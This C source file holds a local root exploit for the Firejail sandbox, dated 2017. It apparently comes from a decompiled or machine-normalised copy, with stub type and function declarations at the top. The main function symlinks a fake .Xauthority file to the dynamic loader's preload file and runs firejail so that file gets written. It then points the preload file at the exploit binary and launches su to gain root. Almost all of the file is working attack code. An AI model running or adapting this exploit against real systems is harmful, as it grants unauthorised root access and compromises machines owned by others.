
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int path ;
typedef int me ;


 scalar_t__ EEXIST ;
 int O_RDWR ;
 int O_TRUNC ;
 int close (int) ;
 int die (char*) ;
 scalar_t__ errno ;
 int execve (char*,char**,int *) ;
 char* getenv (char*) ;
 int ldso ;
 scalar_t__ mkdir (char*,int) ;
 int open (int ,int) ;
 int printf (char*) ;
 scalar_t__ readlink (char*,char*,int) ;
 int snprintf (char*,int,char*,char*) ;
 int strlen (char*) ;
 scalar_t__ symlink (int ,char*) ;
 int system (char*) ;
 int write (int,char*,int) ;

int main()
{
 printf("[*] fire(j|n)ail local root exploit 2017\n\n");

 char me[4096] = {0}, *home = getenv("HOME");
 if (!home)
  die("[-] no $HOME");
 if (readlink("/proc/self/exe", me, sizeof(me) - 1) < 0)
  die("[-] Unable to find myself");

 char path[256] = {0};
 snprintf(path, sizeof(path) - 1, "%s/.firenail", home);
 if (mkdir(path, 0700) < 0 && errno != EEXIST)
  die("[-] mkdir");

 snprintf(path, sizeof(path) - 1, "%s/.firenail/.Xauthority", home);
 if (symlink(ldso, path) < 0 && errno != EEXIST)
  die("[-] symlink");

 system("firejail --private=.firenail /usr/bin/id");

 int fd = open(ldso, O_RDWR|O_TRUNC);
 if (fd < 0)
  die("[-] open");
 write(fd, me, strlen(me));
 write(fd, "\n", 1);
 close(fd);

 char *su[] = {"/bin/su", ((void*)0)};
 execve(*su, su, ((void*)0));
 die("[-] execve su");

 return -1;
}
